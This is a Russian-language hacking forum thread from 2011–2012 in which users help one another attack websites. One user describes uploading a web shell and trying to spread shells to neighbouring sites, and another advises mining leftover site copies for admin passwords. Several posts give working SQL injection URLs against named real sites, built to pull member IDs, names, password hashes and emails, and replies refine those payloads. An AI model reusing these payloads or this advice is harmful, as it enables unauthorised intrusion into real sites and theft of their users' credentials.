HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19051  
Старый 30.12.2011, 12:05
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от DyukiN  
DyukiN said:
залил шелл на один сайт, потом решил залить на соседние сайты, все норм задивается но файл не находит, другие файлы с этой директории читает кроме моих, как можно решить проблему?
Возможно сайты на другом сервере. Т.е. у тебя остались старые версии сайтов. Попробуй сделать что-то типа 123.txt, если не находит, то возможно я прав.
 
Ответить с цитированием

  #19052  
Старый 30.12.2011, 12:11
DyukiN
Guest
Сообщений: n/a
Провел на форуме:
74477

Репутация: 21
По умолчанию

заливал txt, gif, jpg ниче не открывает(( хотя файлы править могу)
 
Ответить с цитированием

  #19053  
Старый 30.12.2011, 12:25
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от DyukiN  
DyukiN said:
заливал txt, gif, jpg ниче не открывает(( хотя файлы править могу)
Попробуй править уже существующие файлы, добавь например:

Посмотри из веба, если в исходнике есть данная строка, то я хз че сказать
 
Ответить с цитированием

  #19054  
Старый 30.12.2011, 13:20
DyukiN
Guest
Сообщений: n/a
Провел на форуме:
74477

Репутация: 21
По умолчанию

походу у меня остались страые версии сайтов(( что то можно извлечь из этого?
 
Ответить с цитированием

  #19055  
Старый 30.12.2011, 13:37
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от DyukiN  
DyukiN said:
походу у меня остались страые версии сайтов(( что то можно извлечь из этого?
Пароли админов. Пути к админке, потом можно залить на те сайты шеллы, без всякого хакинга

UPD. Mожет это из-за группы и овнера?
 
Ответить с цитированием

  #19056  
Старый 31.12.2011, 01:13
jangle
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879

Репутация: 5
Отправить сообщение для jangle с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Select DISTINCT cast (Your Col Name as NVARCHAR(MAX))
а можно поподробнее на примере

Цитата:
Сообщение от None  
-12+union+select+@@version--
как можно сделать что-бы @@VERSION выводилось?
 
Ответить с цитированием

  #19057  
Старый 31.12.2011, 14:42
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

http://www.audit-escort.ru/news.php?AE_content_id=-109+union+select+1,2,3,4,concat_ws(0x3a,id_member, member_name,real_name,passwd,email_address),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28+from+smf_members--+

как быть?
 
Ответить с цитированием

  #19058  
Старый 31.12.2011, 14:56
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

Все просто, таблицы smf_members нет в текущей бд, она находиться в другой

Код:
Code:
http://www.audit-escort.ru/news.php?AE_content_id=-109+union+select+1,2,3,4,table_schema,6,7,8,%209,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,%2026,27,28+from+information_schema.tables+where+table_name=0x736d665f6d656d62657273+--+
 
Ответить с цитированием

  #19059  
Старый 31.12.2011, 17:46
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от jangle  
jangle said:
а можно поподробнее на примере
как можно сделать что-бы @@VERSION выводилось?
-12+union+select+CONVERT(nvarchar,@@version)--

не?
 
Ответить с цитированием

  #19060  
Старый 01.01.2012, 23:23
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Почему ничего не выводит? пропадает вывод об ошибке и показывает нормально страницу

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.pitatel.ru/pclass.php?id=19+or+1+group+by+concat((select+concat_ws(0x3a,name,email,password)+from+batterika_mysql.p_users+limit+1,1),0x00,floor(rand(0)*2))having+min(0)+or+1--+[/COLOR][/COLOR] 
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ